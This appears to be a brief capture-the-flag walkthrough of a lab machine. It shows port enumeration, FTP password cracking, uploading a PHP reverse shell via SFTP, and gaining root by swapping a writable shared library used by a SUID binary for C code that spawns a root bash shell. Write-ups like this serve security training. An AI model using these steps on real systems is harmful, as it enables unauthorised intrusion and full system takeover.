1. get reverse shell
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
browse port 80, get the user name eleanor and alan.
crack ftp service, get the user eleanor's password.
use sftp login as eleanor , get into the path /html and upload reverse php shell, visit and get shell.
2. privilege escalation
find the program with suid, we get the file /home/alan/random.
random used Dynamic link library /lib/librooter.so which we can replace.
Disassemble random with ida.
int __cdecl main(int argc, const char **argv, const char **envp)
{
time_t v3; // rdi
int v5; // [rsp+1Ch] [rbp-4h]
v5 = atoi(argv[1]);
v3 = time(0LL);
srand(v3);
if ( v5 == rand() % 9 + 1 )
makemeroot(v3);
else
puts("Wrong number");
return 0;
Regardless of random numbers, you can enter the dynamic link function makemeroot as long as you try a few more times. We recompile the librooter.so with this code:
#include <stdlib.h>
void makemeroot()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
try a few more times, then get root.
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
